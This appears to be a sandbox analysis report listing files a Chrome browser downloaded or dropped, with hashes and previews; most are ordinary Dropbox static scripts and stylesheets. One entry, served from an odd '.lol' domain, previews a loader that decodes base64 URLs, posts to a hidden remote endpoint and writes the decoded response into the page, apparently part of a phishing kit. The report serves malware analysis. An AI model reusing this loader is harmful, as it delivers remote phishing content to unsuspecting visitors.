                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4500)
                                                    Category:dropped
                                                    Size (bytes):4563
                                                    Entropy (8bit):5.272763904374651
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:873670C8F4DD6B8D17AADD7EF7C4222C
                                                    SHA1:C1334A929AC61A1024FF0004386AFF51B3B3F670
                                                    SHA-256:347F082744C77CCD1244849229B3D2468C78703C4B1E8E44F77283C0BC53AC06
                                                    SHA-512:C4C7499E995D40ADA5C9BC1194EB264319D4096ACB521A6A85EE9D233903EDDE780DAE8278759E9C9E0B3D3A2DAF9419E7F8B2A469B498EEA8E13BC5970557BB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_flows_constants","./c_flows_redux_reducer","./e_file_viewer_static_scl_page_folder","./e_edison","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./e_core_exception","./c_lodash","./c_api_v2_routes_folders_info_provider","./c_src_sink_index","react","./c_core_i18n","metaserver/static/js/langpack","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,t,r,o,n,i,l,a,s,d,u,c,f,_,g,v,w,p,m,k){"use strict";const E=e=>e[o.AUTOMATIONS_NAMESPACE_KEY]||r.defaultAutomationsState,h=e=>{const{userAutomations:t}=E(e);if("completed"===t.status&&t.data){const e=new Map;return t.data.forEach(((t,o)=>{r.isInherited(t)||e.set(o,t)})),e}return new Map},A=e=>E(e).workflowBuilder,W=e=>{const t=A(e);return(null==t?void 0:t.actions)||[]},S=e=>{const{workflowStepsConfig:t}=E(e);return t},T=o.createSel
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1825)
                                                    Category:downloaded
                                                    Size (bytes):1901
                                                    Entropy (8bit):5.292305498976294
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D0AB4A9375968EEA59E8364F465B7C74
                                                    SHA1:E058BF330E4BCBFCEB3F017B64656246F2B5427B
                                                    SHA-256:886C071253758F8A4AA2297E3F7AD25DD9E96FD2063956F5E2D52BED9D6ECBFB
                                                    SHA-512:564F48382BC07BFA8CFC3CC7F96EF812D46F7C5BC543B07A7B2B6998E8F7D8E9637C02E628F2E2D3BB84D996321A5E339339F61E67D77D8C3FB1B2652FDB77F1
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_star-vfl0KtKk3.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.ImageLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M10 11.5a1.392 1.392 0 0 0 1.5-1.5A1.392 1.392 0 0 0 10 8.5 1.393 1.393 0 0 0 8.5 10a1.393 1.393 0 0 0 1.5 1.5Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"m19.01 12.915-.01-.008V5H5v14h14v-6.075l.01-.01ZM17.5 6.5v5.015l-.091-.085a3.254 3.254 0 0 0-4.596 0l-2.171 2.17a.77.77 0 0 1-1.06 0l-.38-.38a2.25 2.25 0 0 0-2.7-.354V6.5H17.5Zm-11 11v-2.636l.58-.58a.75.75 0 0 1 1.06 0l.38.38a2.25 2.25 0 0 0 3.181 0l2.172-2.172a1.76 1.76 0 0 1 2.495.02L17.5 13.56v3.94h-11Z",fill:"currentColor",vectorEffect:"non-s
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (31230)
                                                    Category:downloaded
                                                    Size (bytes):31610
                                                    Entropy (8bit):4.893067377177533
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:930A3D23AFAB1A7E43F8FC7A3BEF3C6E
                                                    SHA1:6C3A113F80F94537AEA9EA0C46E0AFD517A3B03B
                                                    SHA-256:6E63F8E834788775788E7AB4D72E719100FAAB16963BBEEDD725EC4572121E47
                                                    SHA-512:ACC8C237B1EA3F88D64807A8FD3D2D49E69CF3D1F79059D546E5CB44CA38D8B11396DEF16535ABA4551DCF08E7F99B53C88CBDCE67F18312C678B0832341B3E9
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/dig-components/foundations-tokens-vflkwo9I6.css
                                                    Preview:/** @generated -- This file is automatically synced from @dropbox/dig-foundations@3.4.0. DO NOT MODIFY! **/../**. This file should not be imported into your CSS or SASS files - the CSS variables will be available on the page for you to use.. DO NOT USE THIS FILE OR THE CSS VARIABLE TOKENS WITHOUT FIRST TALKING TO THE DESIGN SYSTEMS ON-CALL (SEE #design-systems ON SLACK).**/..:root{--type__title__medium--lineheight:28px;--type__title__medium--fontweight_strong:500;--type__title__medium--fontweight:400;--type__title__medium--fontsize:22px;--type__title__standard--lineheight:28px;--type__title__standard--fontweight_strong:500;--type__title__standard--fontweight:400;--type__title__standard--fontsize:22px;--type__title__small--lineheight:26px;--type__title__small--fontweight_strong:500;--type__title__small--fontweight:400;--type__title__small--fontsize:16px;--type__title__large--lineheight:36px;--type__title__large--fontweight_strong:500;--type__title__large--fontweight:400;--type__title_
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1575)
                                                    Category:dropped
                                                    Size (bytes):1646
                                                    Entropy (8bit):5.112497543927883
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:2FB9B5080CDB4C1D01071E82B6399D62
                                                    SHA1:254E002C5F7A59F01EED818CFB1F3723156EBA4F
                                                    SHA-256:2A2C164228C851CAB655CCCC477078B38A3355901B8FD25F0EF31B45B1915424
                                                    SHA-512:58D9EAE326262B10F850FEF8E7123A4D11F5BF1B9ED0AB9622F58187019F93278934DC6C521BCFC307A64AAFAC9220E3338DAC8029234C3DE97852CC268AEA8F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var l=o(t);const n=l.default.createContext({setFindInDocCallback:()=>{},setPrintCallback:()=>{},setSelectVideoQualityCallback:()=>{},setVideoPlayer:()=>{},setGetPageForSelection:()=>{}});function r(e){return t=>e((()=>t))}const i=e=>{const[o,i]=t.useState(void 0),[a,c]=t.useState(void 0),[u,s]=t.useState(void 0),[d,P]=t.useState(void 0),[v,f]=t.useState(void 0),C=l.default.useMemo((()=>({videoPlayer:o,onFindInDoc:a,onPrint:u,onSelectVideoQuality:d,getPageForSelection:v,setFindInDocCallback:r(c),setPrintCallback:r(s),setSelectVideoQualityCallback:r(P),setVideoPlayer:i,setGetPageForSelection:r(f)})),[o,a,u,d,v]);return l.default.createElement(n.Provider,{value:C},e.children)};i.displayName="PreviewControlProvider";const a=e=>{const{onFindInDoc:o,onPrint:r,onSelectVideoQuality:i,videoPlayer:a,getPageForSelection:c}=e,{setFindInDocCallback:u,setPrintCallback:s,setSelectVideoQualityCall
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):761
                                                    Entropy (8bit):5.276659479414991
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BCA97C77F473C1A4153E5A5EFF0B887E
                                                    SHA1:1ACEAF83FD1153ED48B9B4928C7B701412D92DE7
                                                    SHA-256:D9E0257876D2DED62A4F6245895334AB621598B5432513986086DB037B1C1887
                                                    SHA-512:03779175142138488D507DA761805420B07BEBD03754B7FB386E5CE27CEADE09D322804FC6F94F79E4579A536A3BC8283246747840FB57099217C7ECBC996F79
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cmowunfermlndorminantckrewzoo.lol/GARCIA/admin/js/sc.php
                                                    Preview:var scr= document.createElement('script');..var stc ="aHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuMS4xLm1pbi5qcw=="..scr.setAttribute('src',atob(stc));..document.head.append(scr);..scr.onload=function(){..$.support.cors = true..var url = atob($('#b64u').val());..$.post(url,'scte='.concat(''))....done(function(data){.. if(data=='no'){... document.write('<h1>Please Get an api key to use this page</h1>')... }... else if(data == "outdated"){.... document.write('<h1>Please get an updated version of the page</h1>')... }... else{.... try{..... document.write(atob(data));.... }catch(e){..... document.write('<h1>Cannot write to page</h1>').... }... }...})....fail(function(cd,pg){....document.write("<h1>Unable to connect , Server not found</h1>")...})..}
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1727)
                                                    Category:downloaded
                                                    Size (bytes):1728
                                                    Entropy (8bit):5.079458543466473
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1FAC30C2F785E8257D8E4DB8AE4A2902
                                                    SHA1:955BA8113C4BBE01F42E548E807EA6C33207084C
                                                    SHA-256:94B06B7DEAE3398A35DCF272C96E9117693CF18FE4430953FA2721FE8613EEE7
                                                    SHA-512:792C0CD9DAD746D01534F11E07931F0552884641FE52A8421F35BBAE997849133E6E2C000575B11AD50BC756CBF5B43052030254C852409E29A0347C09F5EE78
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/foundation-vflH6wwwv.css
                                                    Preview:body,input,textarea,select,button,.normal{font-family:"Open Sans","lucida grande","Segoe UI",arial,verdana,"lucida sans unicode",tahoma,sans-serif;font-size:13px;color:var(--dig-color__text__base, #000);font-weight:normal}.maestro body:not(.dig-Button),.maestro input:not(.dig-Button),.maestro textarea:not(.dig-Button),.maestro select:not(.dig-Button),.maestro button:not(.dig-Button),.maestro .normal:not(.dig-Button){font-family:var(--dig-type__bodyfontstack, "Atlas Grotesk Web","Atlas Grotesk",AtlasGrotesk,sans-serif)}body{background-color:var(--dig-color__background__base, #fff);min-height:100%;margin:0;padding:0}a,a *{cursor:pointer;outline:none}a{color:var(--dig-color__primary__base, #0061ff);text-decoration:none}a:focus{text-decoration:underline}a img{border:0}p,h1,h2,h3,h4,h5{margin:0 0 1em 0;line-height:1.6em}h1{font-size:18pt;font-weight:normal;margin:10px 0}h2{padding-top:3px;padding-bottom:10px;margin-bottom:4px;font-size:10pt}h3{padding:0;margin:0;font-size:10pt}h4{margin:0 0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (42466)
                                                    Category:downloaded
                                                    Size (bytes):42514
                                                    Entropy (8bit):5.2266916956369425
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:67455FD8F322750FDA54A2E65442CCE1
                                                    SHA1:D8451445CF272C3C0EE80DC98C89ADC0C2360EAE
                                                    SHA-256:C04A4679BFCDF627CD54E84010C8D023E8E6D78B67AE2A836A2F4CFEE1F6DABA
                                                    SHA-512:3D3675EE84597256E15F2572821820F394B7A9DFFA779AF44EE834B294CCE1174798C3B7228966FB1C1B742EA59CDE8B779D4461103E89E8E7B0E2D8460AB254
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/e_edison-vflZ0Vf2P.js
                                                    Preview:define(["require","exports","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_lodash"],(function(e,t,r,s,n,i,a){"use strict";const o={DEBUG:!1,IDLE_TIMEOUT:200,NETWORK_TIMEOUT:6e4};class d{static format(...e){return["[ttvc]",...e,"::",performance.now()]}static debug(...e){o.DEBUG&&console.debug(...this.format(...e))}static info(...e){o.DEBUG&&console.info(...this.format(...e))}static warn(...e){o.DEBUG&&console.warn(...this.format(...e))}}class c{constructor(){this.pendingRequests=0,this.subscribers=new Set,this.didNetworkTimeOut=!1,this.next=e=>{d.debug("AjaxIdleObservable.next()",e),this.subscribers.forEach((t=>t(e)))},this.startCleanupTimeout=()=>{if(0===o.NETWORK_TIMEOUT)return;this.abortCleanupTimeout();this.cleanupTimeout=window.setTimeout((()=>{d.warn("AjaxIdleObservable","::","Timed out waiting for requests to resolve.","Make sure that incrementAjaxCount() is always matched with decrementAja
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (48378)
                                                    Category:dropped
                                                    Size (bytes):48434
                                                    Entropy (8bit):5.264818350564045
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:05B66753E5AE193C641A5E590BFBDB62
                                                    SHA1:1E448CDFC630F7675532D23C72B86DF321E4448F
                                                    SHA-256:D40F9D2029E0D6B7F51468C99924E6A5A0EDD15260356C6F816C35ECD2633FB3
                                                    SHA-512:1B78FA2FC4F8B13A1DAC71C6AEE2BB1027E1460834763B88164E7E4A2B29C9A8492B7653097CAD7FC96262C80561536DBE659D3975ED867A97CDA33050AB0CF8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["require","exports","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","./c_lodash","./e_core_exception"],(function(e,t,n,s,i,r){"use strict";class o extends s.Message{constructor(e){super(),this.seconds=s.protoInt64.zero,this.nanos=0,s.proto3.util.initPartial(e,this)}fromJson(e,t){if("string"!=typeof e)throw new Error(`cannot decode google.protobuf.Timestamp from JSON: ${s.proto3.json.debug(e)}`);const n=e.match(/^([0-9]{4})-([0-9]{2})-([0-9]{2})T([0-9]{2}):([0-9]{2}):([0-9]{2})(?:Z|\.([0-9]{3,9})Z|([+-][0-9][0-9]:[0-9][0-9]))$/);if(!n)throw new Error("cannot decode google.protobuf.Timestamp from JSON: invalid RFC 3339 string");const i=Date.parse(n[1]+"-"+n[2]+"-"+n[3]+"T"+n[4]+":"+n[5]+":"+n[6]+(n[8]?n[8]:"Z"));if(Number.isNaN(i))throw new Error("cannot decode google.protobuf.Timestamp from JSON: invalid RFC 3339 string");if(i<Date.parse("0001-01-01T00:00:00Z")||i>Date.parse("9999-12-31T23:59:59Z"))throw new Error("cannot decode message google.protobuf.Time
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (12503)
                                                    Category:dropped
                                                    Size (bytes):12558
                                                    Entropy (8bit):5.546181425399993
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5D8CA72F0E04E538402D7BFDB181FCB5
                                                    SHA1:D8DE2951EF07B262E4BD3FB3A2BA78DF3416ED72
                                                    SHA-256:0B686B65CE6FAFCAF218FB2DFF45E65461B0181ECC5C02A084373343B72A5814
                                                    SHA-512:547474B7899395E3C67C7C995583EBC7ED95897F758850F4E170473A6B099601248B0F77C099C4B323E5508E7D25E457D35651458F3F72966E611CA0C7055C6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_browse_models","./c_ts_utils","./c_search_search_helpers","./c_plugin_utils_getImageDefaultSizes"],(function(e,t,a,_,n,s){"use strict";class i extends(t.immutableExports.Record({selected:null,anchor:null},"Selection")){}function E(e,a){return new i({selected:e?t.immutableExports.OrderedSet(e):t.immutableExports.OrderedSet(),anchor:a||(e?e[0]:null)})}class o extends _.Message{constructor(e){super(),this.variant="",this.metadata={},_.proto3.util.initPartial(e,this)}static fromBinary(e,t){return(new o).fromBinary(e,t)}static fromJson(e,t){return(new o).fromJson(e,t)}static fromJsonString(e,t){return(new o).fromJsonString(e,t)}static equals(e,t){return _.proto3.util.equals(o,e,t)}}o.runtime=_.proto3,o.typeName="browse_web.ExperimentData",o.fields=_.proto3.util.newFieldList((()=>[{no:1,name:"variant",kind:"scalar",T:9},{no:2,name:"metadata",kind:"map",K:9,V:{kind:"scalar",T:9}}]));class r extends _.Message{constructor(e){super(
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1334)
                                                    Category:downloaded
                                                    Size (bytes):1335
                                                    Entropy (8bit):5.008359499639428
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F1658825979C2C90A87ECCDB0BDA345F
                                                    SHA1:A5D8AEB6B697042BCEF0592B47C993CCF842E91F
                                                    SHA-256:EA7BAB7B46FE18E97E286C5FA77D915B88AFC7C6BFFDDC0D04F4C698715417CB
                                                    SHA-512:9131824793C2CB5C97DCFECBA8A4B84FCB128F3991EFAFAA64653281675EC6C1A81790B915D73BC71A0567834D8475C6093023C465322F58DE983D41DC7904AD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/shared_link_folder-vfl8WWIJZ.css
                                                    Preview:.copy-link-button{margin-left:auto}#embedded-app,.preview-box{width:100%;height:100%;position:absolute}.has-top-notification .preview-box{margin-top:46px;height:calc(100% - 46px)}.preview-box>div,.preview-box>div>span>div,.preview-box>div>div,.preview-box>div>span>div>div:not(.snackbar-container){height:100%}.request-access-modal .dig-TextArea{margin-top:var(--dig-spacing__micro__large)}.request-access-modal .footer-button-wrapper{display:inline-flex}.request-access-modal .dig-Modal-footer{justify-content:space-between}@media (max-width: 460px){.request-access-modal .dig-Modal-footer{flex-wrap:wrap}.request-access-modal .dig-Modal-footer .dig-Button{margin-top:var(--dig-spacing__micro__large)}}html[folder-previews='true'] #root{height:100%}html[folder-previews='true'] #root>span{display:flex !important;flex-direction:column;overflow:hidden;height:100%}html[folder-previews='true'] .top-notification-bar-silo{flex:0 0 auto}html[folder-previews='true'] .top-notification-bar-silo::before{vi
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4512)
                                                    Category:dropped
                                                    Size (bytes):4589
                                                    Entropy (8bit):5.128946596676467
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C4856EA384132C7A60E289D09683568C
                                                    SHA1:9A7BF3E37AB728A7C550048C0DED80D8707401D2
                                                    SHA-256:40B5B611540A9EA5FD835708CB2BD4DFF7612EA80BD1AC770FBDCAEA41702645
                                                    SHA-512:87C4F3A4A5C78003D643F8014F8CFE3D73E56A1A57C2496D8DAB719ACD1BEF62F23EF46911136DF1BF3C6377FC058569085F5137E50C343F7B8D8B50D6A65C5D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_core_utils_is_text_preview_on","./c_core_logging_actions","./c_core_utils_uuid","./c_react-redux_hooks_useDispatch"],(function(e,i,t,n,r,o,s){"use strict";function d(e){return e&&e.__esModule?e:{default:e}}var l=d(i);function v(e,i=t.FVErrorCode.Unknown,n,r){if(!e){let e;throw e=void 0===r?new t.FVError(i,n,"An error occurred for unknown reason"):new t.FVError(i,n,r),e}return e}function c(e){const{file_viewer_session_id:i=o.v4(),file_preview_session_id:n=o.v4(),file_id:r="",sj_id:s,ns_id:d,file_extension:l=t.getWhitelistedFileExtension(""),device_type:v=t.DeviceType.desktop,extra:c={},file_preview_size:u}=e||{};return{file_viewer_session_id:i,file_preview_session_id:n,file_id:r,sj_id:s,ns_id:d,file_extension:l,device_type:v,file_preview_size:u,extra:{...c,source_context:c.source_context||t.SourceContext.FileViewer,was_flipped:c.was_flipped||!1,file_preview_timeline:{}}}}let u={};const a=(e,i,t,n)=>{const o=s.useDis
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3030)
                                                    Category:downloaded
                                                    Size (bytes):3031
                                                    Entropy (8bit):5.072541246708305
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:7CD34B579C76D077847E1EB2C086CCAD
                                                    SHA1:CD36C07AC7F488668A7EE34D8BEBEC596C192AF0
                                                    SHA-256:A63B0861254D3FFB38AA35BCE52017B3095E5FA5D8A03E085C47A895AB51BAB7
                                                    SHA-512:2B21B2278488F11A28990FF79260F071E8901D53CEB7645860A6A0035BBEED7C8CEACB8F538650A8C88ED3C2FAC722EBBE2C2AF5553ADCEE09445797A623E75D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/metaserver/static/css/maestro_appshell_styles-vflfNNLV5.css
                                                    Preview:body,input,textarea,select,button,.normal{font-family:"Open Sans","lucida grande","Segoe UI",arial,verdana,"lucida sans unicode",tahoma,sans-serif;font-size:13px;color:var(--dig-color__text__base, #000);font-weight:normal}.maestro body:not(.dig-Button),.maestro input:not(.dig-Button),.maestro textarea:not(.dig-Button),.maestro select:not(.dig-Button),.maestro button:not(.dig-Button),.maestro .normal:not(.dig-Button){font-family:var(--dig-type__bodyfontstack, "Atlas Grotesk Web","Atlas Grotesk",AtlasGrotesk,sans-serif)}body{background-color:var(--dig-color__background__base, #fff);min-height:100%;margin:0;padding:0}a,a *{cursor:pointer;outline:none}a{color:var(--dig-color__primary__base, #0061ff);text-decoration:none}a:focus{text-decoration:underline}a img{border:0}p,h1,h2,h3,h4,h5{margin:0 0 1em 0;line-height:1.6em}h1{font-size:18pt;font-weight:normal;margin:10px 0}h2{padding-top:3px;padding-bottom:10px;margin-bottom:4px;font-size:10pt}h3{padding:0;margin:0;font-size:10pt}h4{margin:0 0
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (4679)
                                                    Category:downloaded
                                                    Size (bytes):4776
                                                    Entropy (8bit):5.347391552556368
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:33B390AE55E232DA53DB4AB5985B7FA1
                                                    SHA1:1F95E41CED6B0A9C76954CD6C2D4BD29A78A6B15
                                                    SHA-256:00C0A3D64C88161F434D8EC017EB472450B92B635A73F866301014FE1CA32E30
                                                    SHA-512:06D77246008A7D239DD0F9BDA2FAE5DC562CF9F9FFA7976F028B258F36AA8552D773A0BA862B78418CC1F4A962D9AB59B33DA75202B2A99DF45354A5688EE23F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_preview_audio_video_video_editing_strings-vflM7OQrl.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder"],(function(e,a,s,t){"use strict";function o(e){return e&&e.__esModule?e:{default:e}}var i=o(a);const d={span:function(e){return i.default.createElement(t.Text,{size:"small",color:"standard",key:(e||"").toString()},e)}},r=s.defineMessage({id:"JZ4ppi",defaultMessage:"Trim"}),l=s.defineMessage({id:"R/NK7Q",defaultMessage:"Crop"}),n=s.defineMessage({id:"EyO4kW",defaultMessage:"Rotate left"}),g=s.defineMessage({id:"gdluqV",defaultMessage:"Rotate left <span>(L)</span>"}),f=s.defineMessage({id:"P22r7Z",defaultMessage:"Rotate right"}),M=s.defineMessage({id:"uOI2Jj",defaultMessage:"Rotate right <span>(R)</span>"}),u=s.defineMessage({id:"0c76Q7",defaultMessage:"Flip horizontal"}),p=s.defineMessage({id:"vD6c5O",defaultMessage:"Flip vertical"}),c=e=>((null==e?void 0:e.toString())||"").split(",")[0].trim();e.CROP_TOOLTIP=l,e.FLIP_HORIZONTAL_LABEL=u,e.FLIP_VERTICAL_LABEL=p,e.ROTATE_LEFT_TOOLTIP=g,e.ROTATE_RIGHT_TOOLTI
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (655)
                                                    Category:downloaded
                                                    Size (bytes):734
                                                    Entropy (8bit):5.078056608913159
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:46690B0FDC36D14BC99182046B9055BC
                                                    SHA1:A5834D1DB3ECB44E097C5CF21C7FECF9D16E87C6
                                                    SHA-256:32DD0FB9DCAF89FF685782BAE30A85BE1B9F5AFD0533978FE15277EDDAAF8D2B
                                                    SHA-512:8F625CF32A547C121E5D48A3EC81EE4226F8DC69715DB012506ABECBBAF38B220D2B796F09ABE37CA870B3B78476FBCCE2C9D286388AB00839C144D7B875573D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_preview_audio_video_helper_dimensions-vflRmkLD9.js
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_react_query_helpers_queries_file_content_metadata"],(function(e,t,i,o){"use strict";function n(e){return e&&e.__esModule?e:{default:e}}var u=n(t);function r(e){var t;const{data:i}=o.useFileContentMetadataQuery(e),n=null===(t=null==i?void 0:i.apiData)||void 0===t?void 0:t.metadata;return u.default.useMemo((()=>n&&"video"===n[".tag"]&&n.resolution_height&&n.resolution_width?{width:n.resolution_width,height:n.resolution_height}:null),[n])}e.useIsAudioOnlyVideo=function(){const e=r(i.useRootFile());return i.useRootPreviewType()===i.PreviewType.Video&&!e},e.useVideoDimensions=r}));.//# sourceMappingURL=c_preview_audio_video_helper_dimensions.js-vflOlolSB.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2792)
                                                    Category:downloaded
                                                    Size (bytes):2858
                                                    Entropy (8bit):5.177518633795098
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1EF916225DBF29B8075C00499F3506A8
                                                    SHA1:87F4949FE33B0C3E55E71F76C104CDB3C3BA2C7C
                                                    SHA-256:3A96EBEF4FB561FF5C352472CEF25B46A591F25FD08597393E374AD44E1713BE
                                                    SHA-512:06054C35EDEE2CE66FF1A7389D3483C3451B35EED0FBAF513DA690E1BB982331D55374B114DC8243EE9CD74CFA7C9B4362DC58331A70D5200FB5A75BC3F01946
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_ux_analytics_ux_variants-vflHvkWIl.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(t,e){"use strict";const n="variants",s=",",o=":";let r=0;const a=(t=!1)=>{const n=(t,e)=>{const n=[],s=document.head.querySelectorAll(`meta[${t}]`);return s?(Array.prototype.forEach.call(s,(s=>{try{const o=s.getAttribute(t);if(!o)return;e?n.push(...JSON.parse(o)):n.push(o)}catch{}})),n):[]};if(t&&r>1||!t&&r)return;r++,(()=>{const t=e.getUXVariantsFromDOM();if(!t)return;const n=f(t,"matchers"),s=[];for(const[t,e]of n){const n={feature_name:t,event_name:JSON.parse(e).event_name};s.push(n)}m({variant_tokens:t,matchers:s})})();const o=n("data-uxa-matcher-configs",!0),a=n("data-uxa-variant-tokens",!1);if(!o.length||!a.length)return;m({variant_tokens:a.join(s),matchers:o})},i=(t,e)=>{let n;n=t.startsWith("adobetarget")?"adobe_target_variants":"variants",e[n]?e[n]+=s+t:e[n]=t};const c=(t,e)=>{const n=t=>decodeURIComponent(escape(t)),[s,o,r]=t.split(".").map((t=>atob(t.split("_").join("/").split("-").join("+"))));if(!r)retur
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (9834)
                                                    Category:downloaded
                                                    Size (bytes):9938
                                                    Entropy (8bit):5.437872295227634
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:D374DB76536E35FBA333DB752580F024
                                                    SHA1:76755F12046720A109525801C49884EA7F467E53
                                                    SHA-256:3293459B86EA3D5B5C4517E41F8FAA262EC4BEFE440157AB9F0E01248118A7F8
                                                    SHA-512:A2861DB7DD78899CD9FC57149781471A788248BBAE3BA34E27B6CEE915F052CB931EECF96FFA2B616083A04C9C5ED425246AB167D1F6A00696A09A91E9D25F34
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_transfers_async_browse_entry_point_onboarding_modal_async-vfl03Tbdl.js
                                                    Preview:define(["require","exports","./e_file_viewer_static_scl_page_folder","./e_edison","./c_ts_utils","./e_core_exception","./c_api_v2_routes_folders_info_provider","./c_src_common_constants","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_core_i18n","./c_upload_kit_lib_types","./c_browse_models"],(function(e,r,n,a,i,t,s,o,l,_,d,T){"use strict";var S,E,f,c,A;r.UserFlow=void 0,(S=r.UserFlow||(r.UserFlow={})).TRANSFER_MANAGEMENT_MODAL="transfer_management_modal",S.MANAGEMENT_LIST_VIEW="management_list_view",S.CREATION="creation",S.RECIPIENT="recipient",S.BROWSE="browse",S.TRANSFER_CREATION_MODAL="transfer_creation_modal",r.ModalVisibilityChange=void 0,(E=r.ModalVisibilityChange||(r.ModalVisibilityChange={})).OPEN="open",E.CANCEL="cancel",E.OK="ok",r.SettingsVisibilityChange=void 0,(f=r.SettingsVisibilityChange||(r.SettingsVisibilityChange={})).OPEN="open",f.CLOSE="close",r.TransferListView=void 0,(c=r.TransferListView||(r.TransferListView={}))[c.Active=0]="Active",c[c.Expired=1]="
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (993)
                                                    Category:dropped
                                                    Size (bytes):1073
                                                    Entropy (8bit):5.351936542100546
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F2055198556621336448E2E939C54A66
                                                    SHA1:31193D5017EDB1CAC18B5FE05236380A7B6D1B87
                                                    SHA-256:F6C9A26E0829F1A8B57A267337C98695348099934FDA6BA6373C673F59907E64
